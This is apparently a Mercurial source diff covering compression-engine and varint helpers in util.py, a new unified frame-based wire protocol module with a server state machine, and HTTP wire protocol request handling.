4059 4067 # Force delayed import.
4060 4068 zstd.__version__
4061 4069 return zstd
4062 4070 except ImportError:
4063 4071 return None
4064 4072
4065 4073 def available(self):
4066 4074 return bool(self._module)
4067 4075
4068 4076 def bundletype(self):
4069 4077 """A modern compression algorithm that is fast and highly flexible.
4070 4078
4071 4079 Only supported by Mercurial 4.1 and newer clients.
4072 4080
4073 4081 With the default settings, zstd compression is both faster and yields
4074 4082 better compression than ``gzip``. It also frequently yields better
4075 4083 compression than ``bzip2`` while operating at much higher speeds.
4076 4084
4077 4085 If this engine is available and backwards compatibility is not a
4078 4086 concern, it is likely the best available engine.
4079 4087 """
4080 4088 return 'zstd', 'ZS'
4081 4089
4082 4090 def wireprotosupport(self):
4083 4091 return compewireprotosupport('zstd', 50, 50)
4084 4092
4085 4093 def revlogheader(self):
4086 4094 return '\x28'
4087 4095
4088 4096 def compressstream(self, it, opts=None):
4089 4097 opts = opts or {}
4090 4098 # zstd level 3 is almost always significantly faster than zlib
4091 4099 # while providing no worse compression. It strikes a good balance
4092 4100 # between speed and compression.
4093 4101 level = opts.get('level', 3)
4094 4102
4095 4103 zstd = self._module
4096 4104 z = zstd.ZstdCompressor(level=level).compressobj()
4097 4105 for chunk in it:
4098 4106 data = z.compress(chunk)
4099 4107 if data:
4100 4108 yield data
4101 4109
4102 4110 yield z.flush()
4103 4111
4104 4112 def decompressorreader(self, fh):
4105 4113 zstd = self._module
4106 4114 dctx = zstd.ZstdDecompressor()
4107 4115 return chunkbuffer(dctx.read_from(fh))
4108 4116
4109 4117 class zstdrevlogcompressor(object):
4110 4118 def __init__(self, zstd, level=3):
4111 4119 # Writing the content size adds a few bytes to the output. However,
4112 4120 # it allows decompression to be more optimal since we can
4113 4121 # pre-allocate a buffer to hold the result.
4114 4122 self._cctx = zstd.ZstdCompressor(level=level,
4115 4123 write_content_size=True)
4116 4124 self._dctx = zstd.ZstdDecompressor()
4117 4125 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
4118 4126 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
4119 4127
4120 4128 def compress(self, data):
4121 4129 insize = len(data)
4122 4130 # Caller handles empty input case.
4123 4131 assert insize > 0
4124 4132
4125 4133 if insize < 50:
4126 4134 return None
4127 4135
4128 4136 elif insize <= 1000000:
4129 4137 compressed = self._cctx.compress(data)
4130 4138 if len(compressed) < insize:
4131 4139 return compressed
4132 4140 return None
4133 4141 else:
4134 4142 z = self._cctx.compressobj()
4135 4143 chunks = []
4136 4144 pos = 0
4137 4145 while pos < insize:
4138 4146 pos2 = pos + self._compinsize
4139 4147 chunk = z.compress(data[pos:pos2])
4140 4148 if chunk:
4141 4149 chunks.append(chunk)
4142 4150 pos = pos2
4143 4151 chunks.append(z.flush())
4144 4152
4145 4153 if sum(map(len, chunks)) < insize:
4146 4154 return ''.join(chunks)
4147 4155 return None
4148 4156
4149 4157 def decompress(self, data):
4150 4158 insize = len(data)
4151 4159
4152 4160 try:
4153 4161 # This was measured to be faster than other streaming
4154 4162 # decompressors.
4155 4163 dobj = self._dctx.decompressobj()
4156 4164 chunks = []
4157 4165 pos = 0
4158 4166 while pos < insize:
4159 4167 pos2 = pos + self._decompinsize
4160 4168 chunk = dobj.decompress(data[pos:pos2])
4161 4169 if chunk:
4162 4170 chunks.append(chunk)
4163 4171 pos = pos2
4164 4172 # Frame should be exhausted, so no finish() API.
4165 4173
4166 4174 return ''.join(chunks)
4167 4175 except Exception as e:
4168 4176 raise error.RevlogError(_('revlog decompress error: %s') %
4169 4177 forcebytestr(e))
4170 4178
4171 4179 def revlogcompressor(self, opts=None):
4172 4180 opts = opts or {}
4173 4181 return self.zstdrevlogcompressor(self._module,
4174 4182 level=opts.get('level', 3))
4175 4183
4176 4184 compengines.register(_zstdengine())
4177 4185
4178 4186 def bundlecompressiontopics():
4179 4187 """Obtains a list of available bundle compressions for use in help."""
4180 4188 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
4181 4189 items = {}
4182 4190
4183 4191 # We need to format the docstring. So use a dummy object/type to hold it
4184 4192 # rather than mutating the original.
4185 4193 class docobject(object):
4186 4194 pass
4187 4195
4188 4196 for name in compengines:
4189 4197 engine = compengines[name]
4190 4198
4191 4199 if not engine.available():
4192 4200 continue
4193 4201
4194 4202 bt = engine.bundletype()
4195 4203 if not bt or not bt[0]:
4196 4204 continue
4197 4205
4198 4206 doc = pycompat.sysstr('``%s``\n %s') % (
4199 4207 bt[0], engine.bundletype.__doc__)
4200 4208
4201 4209 value = docobject()
4202 4210 value.__doc__ = doc
4203 4211 value._origdoc = engine.bundletype.__doc__
4204 4212 value._origfunc = engine.bundletype
4205 4213
4206 4214 items[bt[0]] = value
4207 4215
4208 4216 return items
4209 4217
4210 4218 i18nfunctions = bundlecompressiontopics().values()
4211 4219
4212 4220 # convenient shortcut
4213 4221 dst = debugstacktrace
4214 4222
4215 4223 def safename(f, tag, ctx, others=None):
4216 4224 """
4217 4225 Generate a name that it is safe to rename f to in the given context.
4218 4226
4219 4227 f: filename to rename
4220 4228 tag: a string tag that will be included in the new name
4221 4229 ctx: a context, in which the new name must not exist
4222 4230 others: a set of other filenames that the new name must not be in
4223 4231
4224 4232 Returns a file name of the form oldname~tag[~number] which does not exist
4225 4233 in the provided context and is not in the set of other names.
4226 4234 """
4227 4235 if others is None:
4228 4236 others = set()
4229 4237
4230 4238 fn = '%s~%s' % (f, tag)
4231 4239 if fn not in ctx and fn not in others:
4232 4240 return fn
4233 4241 for n in itertools.count(1):
4234 4242 fn = '%s~%s~%s' % (f, tag, n)
4235 4243 if fn not in ctx and fn not in others:
4236 4244 return fn
4237 4245
4238 4246 def readexactly(stream, n):
4239 4247 '''read n bytes from stream.read and abort if less was available'''
4240 4248 s = stream.read(n)
4241 4249 if len(s) < n:
4242 4250 raise error.Abort(_("stream ended unexpectedly"
4243 4251 " (got %d bytes, expected %d)")
4244 4252 % (len(s), n))
4245 4253 return s
4246 4254
4247 4255 def uvarintencode(value):
4248 4256 """Encode an unsigned integer value to a varint.
4249 4257
4250 4258 A varint is a variable length integer of 1 or more bytes. Each byte
4251 4259 except the last has the most significant bit set. The lower 7 bits of
4252 4260 each byte store the 2's complement representation, least significant group
4253 4261 first.
4254 4262
4255 4263 >>> uvarintencode(0)
4256 4264 '\\x00'
4257 4265 >>> uvarintencode(1)
4258 4266 '\\x01'
4259 4267 >>> uvarintencode(127)
4260 4268 '\\x7f'
4261 4269 >>> uvarintencode(1337)
4262 4270 '\\xb9\\n'
4263 4271 >>> uvarintencode(65536)
4264 4272 '\\x80\\x80\\x04'
4265 4273 >>> uvarintencode(-1)
4266 4274 Traceback (most recent call last):
4267 4275 ...
4268 4276 ProgrammingError: negative value for uvarint: -1
4269 4277 """
4270 4278 if value < 0:
4271 4279 raise error.ProgrammingError('negative value for uvarint: %d'
4272 4280 % value)
4273 4281 bits = value & 0x7f
4274 4282 value >>= 7
4275 4283 bytes = []
4276 4284 while value:
4277 4285 bytes.append(pycompat.bytechr(0x80 | bits))
4278 4286 bits = value & 0x7f
4279 4287 value >>= 7
4280 4288 bytes.append(pycompat.bytechr(bits))
4281 4289
4282 4290 return ''.join(bytes)
4283 4291
4284 4292 def uvarintdecodestream(fh):
4285 4293 """Decode an unsigned variable length integer from a stream.
4286 4294
4287 4295 The passed argument is anything that has a ``.read(N)`` method.
4288 4296
4289 4297 >>> try:
4290 4298 ... from StringIO import StringIO as BytesIO
4291 4299 ... except ImportError:
4292 4300 ... from io import BytesIO
4293 4301 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4294 4302 0
4295 4303 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4296 4304 1
4297 4305 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4298 4306 127
4299 4307 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4300 4308 1337
4301 4309 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4302 4310 65536
4303 4311 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4304 4312 Traceback (most recent call last):
4305 4313 ...
4306 4314 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4307 4315 """
4308 4316 result = 0
4309 4317 shift = 0
4310 4318 while True:
4311 4319 byte = ord(readexactly(fh, 1))
4312 4320 result |= ((byte & 0x7f) << shift)
4313 4321 if not (byte & 0x80):
4314 4322 return result
4315 4323 shift += 7
4316 4324
4317 4325 ###
4318 4326 # Deprecation warnings for util.py splitting
4319 4327 ###
4320 4328
4321 4329 defaultdateformats = dateutil.defaultdateformats
4322 4330
4323 4331 extendeddateformats = dateutil.extendeddateformats
4324 4332
4325 4333 def makedate(*args, **kwargs):
4326 4334 msg = ("'util.makedate' is deprecated, "
4327 4335 "use 'utils.dateutil.makedate'")
4328 4336 nouideprecwarn(msg, "4.6")
4329 4337 return dateutil.makedate(*args, **kwargs)
4330 4338
4331 4339 def datestr(*args, **kwargs):
4332 4340 msg = ("'util.datestr' is deprecated, "
4333 4341 "use 'utils.dateutil.datestr'")
4334 4342 nouideprecwarn(msg, "4.6")
4335 4343 return dateutil.datestr(*args, **kwargs)
4336 4344
4337 4345 def shortdate(*args, **kwargs):
4338 4346 msg = ("'util.shortdate' is deprecated, "
4339 4347 "use 'utils.dateutil.shortdate'")
4340 4348 nouideprecwarn(msg, "4.6")
4341 4349 return dateutil.shortdate(*args, **kwargs)
4342 4350
4343 4351 def parsetimezone(*args, **kwargs):
4344 4352 msg = ("'util.parsetimezone' is deprecated, "
4345 4353 "use 'utils.dateutil.parsetimezone'")
4346 4354 nouideprecwarn(msg, "4.6")
4347 4355 return dateutil.parsetimezone(*args, **kwargs)
4348 4356
4349 4357 def strdate(*args, **kwargs):
4350 4358 msg = ("'util.strdate' is deprecated, "
4351 4359 "use 'utils.dateutil.strdate'")
4352 4360 nouideprecwarn(msg, "4.6")
4353 4361 return dateutil.strdate(*args, **kwargs)
4354 4362
4355 4363 def parsedate(*args, **kwargs):
4356 4364 msg = ("'util.parsedate' is deprecated, "
4357 4365 "use 'utils.dateutil.parsedate'")
4358 4366 nouideprecwarn(msg, "4.6")
4359 4367 return dateutil.parsedate(*args, **kwargs)
4360 4368
4361 4369 def matchdate(*args, **kwargs):
4362 4370 msg = ("'util.matchdate' is deprecated, "
4363 4371 "use 'utils.dateutil.matchdate'")
4364 4372 nouideprecwarn(msg, "4.6")
4365 4373 return dateutil.matchdate(*args, **kwargs)
@@ -1,156 +1,395 b''
1 1 # wireprotoframing.py - unified framing protocol for wire protocol
2 2 #
3 3 # Copyright 2018 Gregory Szorc <gregory.szorc@gmail.com>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 # This file contains functionality to support the unified frame-based wire
9 9 # protocol. For details about the protocol, see
10 10 # `hg help internals.wireprotocol`.
11 11
12 12 from __future__ import absolute_import
13 13
14 14 import struct
15 15
16 from .i18n import _
16 17 from . import (
18 error,
17 19 util,
18 20 )
19 21
20 22 FRAME_HEADER_SIZE = 4
21 23 DEFAULT_MAX_FRAME_SIZE = 32768
22 24
23 25 FRAME_TYPE_COMMAND_NAME = 0x01
24 26 FRAME_TYPE_COMMAND_ARGUMENT = 0x02
25 27 FRAME_TYPE_COMMAND_DATA = 0x03
26 28
27 29 FRAME_TYPES = {
28 30 b'command-name': FRAME_TYPE_COMMAND_NAME,
29 31 b'command-argument': FRAME_TYPE_COMMAND_ARGUMENT,
30 32 b'command-data': FRAME_TYPE_COMMAND_DATA,
31 33 }
32 34
33 35 FLAG_COMMAND_NAME_EOS = 0x01
34 36 FLAG_COMMAND_NAME_HAVE_ARGS = 0x02
35 37 FLAG_COMMAND_NAME_HAVE_DATA = 0x04
36 38
37 39 FLAGS_COMMAND = {
38 40 b'eos': FLAG_COMMAND_NAME_EOS,
39 41 b'have-args': FLAG_COMMAND_NAME_HAVE_ARGS,
40 42 b'have-data': FLAG_COMMAND_NAME_HAVE_DATA,
41 43 }
42 44
43 45 FLAG_COMMAND_ARGUMENT_CONTINUATION = 0x01
44 46 FLAG_COMMAND_ARGUMENT_EOA = 0x02
45 47
46 48 FLAGS_COMMAND_ARGUMENT = {
47 49 b'continuation': FLAG_COMMAND_ARGUMENT_CONTINUATION,
48 50 b'eoa': FLAG_COMMAND_ARGUMENT_EOA,
49 51 }
50 52
51 53 FLAG_COMMAND_DATA_CONTINUATION = 0x01
52 54 FLAG_COMMAND_DATA_EOS = 0x02
53 55
54 56 FLAGS_COMMAND_DATA = {
55 57 b'continuation': FLAG_COMMAND_DATA_CONTINUATION,
56 58 b'eos': FLAG_COMMAND_DATA_EOS,
57 59 }
58 60
59 61 # Maps frame types to their available flags.
60 62 FRAME_TYPE_FLAGS = {
61 63 FRAME_TYPE_COMMAND_NAME: FLAGS_COMMAND,
62 64 FRAME_TYPE_COMMAND_ARGUMENT: FLAGS_COMMAND_ARGUMENT,
63 65 FRAME_TYPE_COMMAND_DATA: FLAGS_COMMAND_DATA,
64 66 }
65 67
66 68 ARGUMENT_FRAME_HEADER = struct.Struct(r'<HH')
67 69
68 70 def makeframe(frametype, frameflags, payload):
69 71 """Assemble a frame into a byte array."""
70 72 # TODO assert size of payload.
71 73 frame = bytearray(FRAME_HEADER_SIZE + len(payload))
72 74
73 75 l = struct.pack(r'<I', len(payload))
74 76 frame[0:3] = l[0:3]
75 77 frame[3] = (frametype << 4) | frameflags
76 78 frame[4:] = payload
77 79
78 80 return frame
79 81
80 82 def makeframefromhumanstring(s):
81 83 """Given a string of the form: <type> <flags> <payload>, creates a frame.
82 84
83 85 This can be used by user-facing applications and tests for creating
84 86 frames easily without having to type out a bunch of constants.
85 87
86 88 Frame type and flags can be specified by integer or named constant.
87 89 Flags can be delimited by `|` to bitwise OR them together.
88 90 """
89 91 frametype, frameflags, payload = s.split(b' ', 2)
90 92
91 93 if frametype in FRAME_TYPES:
92 94 frametype = FRAME_TYPES[frametype]
93 95 else:
94 96 frametype = int(frametype)
95 97
96 98 finalflags = 0
97 99 validflags = FRAME_TYPE_FLAGS[frametype]
98 100 for flag in frameflags.split(b'|'):
99 101 if flag in validflags:
100 102 finalflags |= validflags[flag]
101 103 else:
102 104 finalflags |= int(flag)
103 105
104 106 payload = util.unescapestr(payload)
105 107
106 108 return makeframe(frametype, finalflags, payload)
107 109
110 def parseheader(data):
111 """Parse a unified framing protocol frame header from a buffer.
112
113 The header is expected to be in the buffer at offset 0 and the
114 buffer is expected to be large enough to hold a full header.
115 """
116 # 24 bits payload length (little endian)
117 # 4 bits frame type
118 # 4 bits frame flags
119 # ... payload
120 framelength = data[0] + 256 * data[1] + 16384 * data[2]
121 typeflags = data[3]
122
123 frametype = (typeflags & 0xf0) >> 4
124 frameflags = typeflags & 0x0f
125
126 return frametype, frameflags, framelength
127
128 def readframe(fh):
129 """Read a unified framing protocol frame from a file object.
130
131 Returns a 3-tuple of (type, flags, payload) for the decoded frame or
132 None if no frame is available. May raise if a malformed frame is
133 seen.
134 """
135 header = bytearray(FRAME_HEADER_SIZE)
136
137 readcount = fh.readinto(header)
138
139 if readcount == 0:
140 return None
141
142 if readcount != FRAME_HEADER_SIZE:
143 raise error.Abort(_('received incomplete frame: got %d bytes: %s') %
144 (readcount, header))
145
146 frametype, frameflags, framelength = parseheader(header)
147
148 payload = fh.read(framelength)
149 if len(payload) != framelength:
150 raise error.Abort(_('frame length error: expected %d; got %d') %
151 (framelength, len(payload)))
152
153 return frametype, frameflags, payload
154
108 155 def createcommandframes(cmd, args, datafh=None):
109 156 """Create frames necessary to transmit a request to run a command.
110 157
111 158 This is a generator of bytearrays. Each item represents a frame
112 159 ready to be sent over the wire to a peer.
113 160 """
114 161 flags = 0
115 162 if args:
116 163 flags |= FLAG_COMMAND_NAME_HAVE_ARGS
117 164 if datafh:
118 165 flags |= FLAG_COMMAND_NAME_HAVE_DATA
119 166
120 167 if not flags:
121 168 flags |= FLAG_COMMAND_NAME_EOS
122 169
123 170 yield makeframe(FRAME_TYPE_COMMAND_NAME, flags, cmd)
124 171
125 172 for i, k in enumerate(sorted(args)):
126 173 v = args[k]
127 174 last = i == len(args) - 1
128 175
129 176 # TODO handle splitting of argument values across frames.
130 177 payload = bytearray(ARGUMENT_FRAME_HEADER.size + len(k) + len(v))
131 178 offset = 0
132 179 ARGUMENT_FRAME_HEADER.pack_into(payload, offset, len(k), len(v))
133 180 offset += ARGUMENT_FRAME_HEADER.size
134 181 payload[offset:offset + len(k)] = k
135 182 offset += len(k)
136 183 payload[offset:offset + len(v)] = v
137 184
138 185 flags = FLAG_COMMAND_ARGUMENT_EOA if last else 0
139 186 yield makeframe(FRAME_TYPE_COMMAND_ARGUMENT, flags, payload)
140 187
141 188 if datafh:
142 189 while True:
143 190 data = datafh.read(DEFAULT_MAX_FRAME_SIZE)
144 191
145 192 done = False
146 193 if len(data) == DEFAULT_MAX_FRAME_SIZE:
147 194 flags = FLAG_COMMAND_DATA_CONTINUATION
148 195 else:
149 196 flags = FLAG_COMMAND_DATA_EOS
150 197 assert datafh.read(1) == b''
151 198 done = True
152 199
153 200 yield makeframe(FRAME_TYPE_COMMAND_DATA, flags, data)
154 201
155 202 if done:
156 203 break
204
205 class serverreactor(object):
206 """Holds state of a server handling frame-based protocol requests.
207
208 This class is the "brain" of the unified frame-based protocol server
209 component. While the protocol is stateless from the perspective of
210 requests/commands, something needs to track which frames have been
211 received, what frames to expect, etc. This class is that thing.
212
213 Instances are modeled as a state machine of sorts. Instances are also
214 reactionary to external events. The point of this class is to encapsulate
215 the state of the connection and the exchange of frames, not to perform
216 work. Instead, callers tell this class when something occurs, like a
217 frame arriving. If that activity is worthy of a follow-up action (say
218 *run a command*), the return value of that handler will say so.
219
220 I/O and CPU intensive operations are purposefully delegated outside of
221 this class.
222
223 Consumers are expected to tell instances when events occur. They do so by
224 calling the various ``on*`` methods. These methods return a 2-tuple
225 describing any follow-up action(s) to take. The first element is the
226 name of an action to perform. The second is a data structure (usually
227 a dict) specific to that action that contains more information. e.g.
228 if the server wants to send frames back to the client, the data structure
229 will contain a reference to those frames.
230
231 Valid actions that consumers can be instructed to take are:
232
233 error
234 Indicates that an error occurred. Consumer should probably abort.
235
236 runcommand
237 Indicates that the consumer should run a wire protocol command. Details
238 of the command to run are given in the data structure.
239
240 wantframe
241 Indicates that nothing of interest happened and the server is waiting on
242 more frames from the client before anything interesting can be done.
243 """
244
245 def __init__(self):
246 self._state = 'idle'
247 self._activecommand = None
248 self._activeargs = None
249 self._activedata = None
250 self._expectingargs = None
251 self._expectingdata = None
252 self._activeargname = None
253 self._activeargchunks = None
254
255 def onframerecv(self, frametype, frameflags, payload):
256 """Process a frame that has been received off the wire.
257
258 Returns a dict with an ``action`` key that details what action,
259 if any, the consumer should take next.
260 """
261 handlers = {
262 'idle': self._onframeidle,
263 'command-receiving-args': self._onframereceivingargs,
264 'command-receiving-data': self._onframereceivingdata,
265 'errored': self._onframeerrored,
266 }
267
268 meth = handlers.get(self._state)
269 if not meth:
270 raise error.ProgrammingError('unhandled state: %s' % self._state)
271
272 return meth(frametype, frameflags, payload)
273
274 def _makeerrorresult(self, msg):
275 return 'error', {
276 'message': msg,
277 }
278
279 def _makeruncommandresult(self):
280 return 'runcommand', {
281 'command': self._activecommand,
282 'args': self._activeargs,
283 'data': self._activedata.getvalue() if self._activedata else None,
284 }
285
286 def _makewantframeresult(self):
287 return 'wantframe', {
288 'state': self._state,
289 }
290
291 def _onframeidle(self, frametype, frameflags, payload):
292 # The only frame type that should be received in this state is a
293 # command request.
294 if frametype != FRAME_TYPE_COMMAND_NAME:
295 self._state = 'errored'
296 return self._makeerrorresult(
297 _('expected command frame; got %d') % frametype)
298
299 self._activecommand = payload
300 self._activeargs = {}
301 self._activedata = None
302
303 if frameflags & FLAG_COMMAND_NAME_EOS:
304 return self._makeruncommandresult()
305
306 self._expectingargs = bool(frameflags & FLAG_COMMAND_NAME_HAVE_ARGS)
307 self._expectingdata = bool(frameflags & FLAG_COMMAND_NAME_HAVE_DATA)
308
309 if self._expectingargs:
310 self._state = 'command-receiving-args'
311 return self._makewantframeresult()
312 elif self._expectingdata:
313 self._activedata = util.bytesio()
314 self._state = 'command-receiving-data'
315 return self._makewantframeresult()
316 else:
317 self._state = 'errored'
318 return self._makeerrorresult(_('missing frame flags on '
319 'command frame'))
320
321 def _onframereceivingargs(self, frametype, frameflags, payload):
322 if frametype != FRAME_TYPE_COMMAND_ARGUMENT:
323 self._state = 'errored'
324 return self._makeerrorresult(_('expected command argument '
325 'frame; got %d') % frametype)
326
327 offset = 0
328 namesize, valuesize = ARGUMENT_FRAME_HEADER.unpack_from(payload)
329 offset += ARGUMENT_FRAME_HEADER.size
330
331 # The argument name MUST fit inside the frame.
332 argname = bytes(payload[offset:offset + namesize])
333 offset += namesize
334
335 if len(argname) != namesize:
336 self._state = 'errored'
337 return self._makeerrorresult(_('malformed argument frame: '
338 'partial argument name'))
339
340 argvalue = bytes(payload[offset:])
341
342 # Argument value spans multiple frames. Record our active state
343 # and wait for the next frame.
344 if frameflags & FLAG_COMMAND_ARGUMENT_CONTINUATION:
345 raise error.ProgrammingError('not yet implemented')
346 self._activeargname = argname
347 self._activeargchunks = [argvalue]
348 self._state = 'command-arg-continuation'
349 return self._makewantframeresult()
350
351 # Common case: the argument value is completely contained in this
352 # frame.
353
354 if len(argvalue) != valuesize:
355 self._state = 'errored'
356 return self._makeerrorresult(_('malformed argument frame: '
357 'partial argument value'))
358
359 self._activeargs[argname] = argvalue
360
361 if frameflags & FLAG_COMMAND_ARGUMENT_EOA:
362 if self._expectingdata:
363 self._state = 'command-receiving-data'
364 self._activedata = util.bytesio()
365 # TODO signal request to run a command once we don't
366 # buffer data frames.
367 return self._makewantframeresult()
368 else:
369 self._state = 'waiting'
370 return self._makeruncommandresult()
371 else:
372 return self._makewantframeresult()
373
374 def _onframereceivingdata(self, frametype, frameflags, payload):
375 if frametype != FRAME_TYPE_COMMAND_DATA:
376 self._state = 'errored'
377 return self._makeerrorresult(_('expected command data frame; '
378 'got %d') % frametype)
379
380 # TODO support streaming data instead of buffering it.
381 self._activedata.write(payload)
382
383 if frameflags & FLAG_COMMAND_DATA_CONTINUATION:
384 return self._makewantframeresult()
385 elif frameflags & FLAG_COMMAND_DATA_EOS:
386 self._activedata.seek(0)
387 self._state = 'idle'
388 return self._makeruncommandresult()
389 else:
390 self._state = 'errored'
391 return self._makeerrorresult(_('command data frame without '
392 'flags'))
393
394 def _onframeerrored(self, frametype, frameflags, payload):
395 return self._makeerrorresult(_('server already errored'))
@@ -1,833 +1,881 b''
1 1 # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net>
2 2 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
3 3 #
4 4 # This software may be used and distributed according to the terms of the
5 5 # GNU General Public License version 2 or any later version.
6 6
7 7 from __future__ import absolute_import
8 8
9 9 import contextlib
10 10 import struct
11 11 import sys
12 12 import threading
13 13
14 14 from .i18n import _
15 15 from . import (
16 16 encoding,
17 17 error,
18 18 hook,
19 19 pycompat,
20 20 util,
21 21 wireproto,
22 wireprotoframing,
22 23 wireprototypes,
23 24 )
24 25
25 26 stringio = util.stringio
26 27
27 28 urlerr = util.urlerr
28 29 urlreq = util.urlreq
29 30
30 31 HTTP_OK = 200
31 32
32 33 HGTYPE = 'application/mercurial-0.1'
33 34 HGTYPE2 = 'application/mercurial-0.2'
34 35 HGERRTYPE = 'application/hg-error'
35 36 FRAMINGTYPE = b'application/mercurial-exp-framing-0001'
36 37
37 38 HTTPV2 = wireprototypes.HTTPV2
38 39 SSHV1 = wireprototypes.SSHV1
39 40 SSHV2 = wireprototypes.SSHV2
40 41
41 42 def decodevaluefromheaders(req, headerprefix):
42 43 """Decode a long value from multiple HTTP request headers.
43 44
44 45 Returns the value as a bytes, not a str.
45 46 """
46 47 chunks = []
47 48 i = 1
48 49 while True:
49 50 v = req.headers.get(b'%s-%d' % (headerprefix, i))
50 51 if v is None:
51 52 break
52 53 chunks.append(pycompat.bytesurl(v))
53 54 i += 1
54 55
55 56 return ''.join(chunks)
56 57
57 58 class httpv1protocolhandler(wireprototypes.baseprotocolhandler):
58 59 def __init__(self, req, ui, checkperm):
59 60 self._req = req
60 61 self._ui = ui
61 62 self._checkperm = checkperm
62 63
63 64 @property
64 65 def name(self):
65 66 return 'http-v1'
66 67
67 68 def getargs(self, args):
68 69 knownargs = self._args()
69 70 data = {}
70 71 keys = args.split()
71 72 for k in keys:
72 73 if k == '*':
73 74 star = {}
74 75 for key in knownargs.keys():
75 76 if key != 'cmd' and key not in keys:
76 77 star[key] = knownargs[key][0]
77 78 data['*'] = star
78 79 else:
79 80 data[k] = knownargs[k][0]
80 81 return [data[k] for k in keys]
81 82
82 83 def _args(self):
83 84 args = self._req.qsparams.asdictoflists()
84 85 postlen = int(self._req.headers.get(b'X-HgArgs-Post', 0))
85 86 if postlen:
86 87 args.update(urlreq.parseqs(
87 88 self._req.bodyfh.read(postlen), keep_blank_values=True))
88 89 return args
89 90
90 91 argvalue = decodevaluefromheaders(self._req, b'X-HgArg')
91 92 args.update(urlreq.parseqs(argvalue, keep_blank_values=True))
92 93 return args
93 94
94 95 def forwardpayload(self, fp):
95 96 # Existing clients *always* send Content-Length.
96 97 length = int(self._req.headers[b'Content-Length'])
97 98
98 99 # If httppostargs is used, we need to read Content-Length
99 100 # minus the amount that was consumed by args.
100 101 length -= int(self._req.headers.get(b'X-HgArgs-Post', 0))
101 102 for s in util.filechunkiter(self._req.bodyfh, limit=length):
102 103 fp.write(s)
103 104
104 105 @contextlib.contextmanager
105 106 def mayberedirectstdio(self):
106 107 oldout = self._ui.fout
107 108 olderr = self._ui.ferr
108 109
109 110 out = util.stringio()
110 111
111 112 try:
112 113 self._ui.fout = out
113 114 self._ui.ferr = out
114 115 yield out
115 116 finally:
116 117 self._ui.fout = oldout
117 118 self._ui.ferr = olderr
118 119
119 120 def client(self):
120 121 return 'remote:%s:%s:%s' % (
121 122 self._req.urlscheme,
122 123 urlreq.quote(self._req.remotehost or ''),
123 124 urlreq.quote(self._req.remoteuser or ''))
124 125
125 126 def addcapabilities(self, repo, caps):
126 127 caps.append('httpheader=%d' %
127 128 repo.ui.configint('server', 'maxhttpheaderlen'))
128 129 if repo.ui.configbool('experimental', 'httppostargs'):
129 130 caps.append('httppostargs')
130 131
131 132 # FUTURE advertise 0.2rx once support is implemented
132 133 # FUTURE advertise minrx and mintx after consulting config option
133 134 caps.append('httpmediatype=0.1rx,0.1tx,0.2tx')
134 135
135 136 compengines = wireproto.supportedcompengines(repo.ui, util.SERVERROLE)
136 137 if compengines:
137 138 comptypes = ','.join(urlreq.quote(e.wireprotosupport().name)
138 139 for e in compengines)
139 140 caps.append('compression=%s' % comptypes)
140 141
141 142 return caps
142 143
143 144 def checkperm(self, perm):
144 145 return self._checkperm(perm)
145 146
146 147 # This method exists mostly so that extensions like remotefilelog can
147 148 # disable a kludgey legacy method only over http. As of early 2018,
148 149 # there are no other known users, so with any luck we can discard this
149 150 # hook if remotefilelog becomes a first-party extension.
150 151 def iscmd(cmd):
151 152 return cmd in wireproto.commands
152 153
153 154 def handlewsgirequest(rctx, req, res, checkperm):
154 155 """Possibly process a wire protocol request.
155 156
156 157 If the current request is a wire protocol request, the request is
157 158 processed by this function.
158 159
159 160 ``req`` is a ``parsedrequest`` instance.
160 161 ``res`` is a ``wsgiresponse`` instance.
161 162
162 163 Returns a bool indicating if the request was serviced. If set, the caller
163 164 should stop processing the request, as a response has already been issued.
164 165 """
165 166 # Avoid cycle involving hg module.
166 167 from .hgweb import common as hgwebcommon
167 168
168 169 repo = rctx.repo
169 170
170 171 # HTTP version 1 wire protocol requests are denoted by a "cmd" query
171 172 # string parameter. If it isn't present, this isn't a wire protocol
172 173 # request.
173 174 if 'cmd' not in req.qsparams:
174 175 return False
175 176
176 177 cmd = req.qsparams['cmd']
177 178
178 179 # The "cmd" request parameter is used by both the wire protocol and hgweb.
179 180 # While not all wire protocol commands are available for all transports,
180 181 # if we see a "cmd" value that resembles a known wire protocol command, we
181 182 # route it to a protocol handler. This is better than routing possible
182 183 # wire protocol requests to hgweb because it prevents hgweb from using
183 184 # known wire protocol commands and it is less confusing for machine
184 185 # clients.
185 186 if not iscmd(cmd):
186 187 return False
187 188
188 189 # The "cmd" query string argument is only valid on the root path of the
189 190 # repo. e.g. ``/?cmd=foo``, ``/repo?cmd=foo``. URL paths within the repo
190 191 # like ``/blah?cmd=foo`` are not allowed. So don't recognize the request
191 192 # in this case. We send an HTTP 404 for backwards compatibility reasons.
192 193 if req.dispatchpath:
193 194 res.status = hgwebcommon.statusmessage(404)
194 195 res.headers['Content-Type'] = HGTYPE
195 196 # TODO This is not a good response to issue for this request. This
196 197 # is mostly for BC for now.
197 198 res.setbodybytes('0\n%s\n' % b'Not Found')
198 199 return True
199 200
200 201 proto = httpv1protocolhandler(req, repo.ui,
201 202 lambda perm: checkperm(rctx, req, perm))
202 203
203 204 # The permissions checker should be the only thing that can raise an
204 205 # ErrorResponse. It is kind of a layer violation to catch an hgweb
205 206 # exception here. So consider refactoring into a exception type that
206 207 # is associated with the wire protocol.
207 208 try:
208 209 _callhttp(repo, req, res, proto, cmd)
209 210 except hgwebcommon.ErrorResponse as e:
210 211 for k, v in e.headers:
211 212 res.headers[k] = v
212 213 res.status = hgwebcommon.statusmessage(e.code, pycompat.bytestr(e))
213 214 # TODO This response body assumes the failed command was
214 215 # "unbundle." That assumption is not always valid.
215 216 res.setbodybytes('0\n%s\n' % pycompat.bytestr(e))
216 217
217 218 return True
218 219
219 220 def handlewsgiapirequest(rctx, req, res, checkperm):
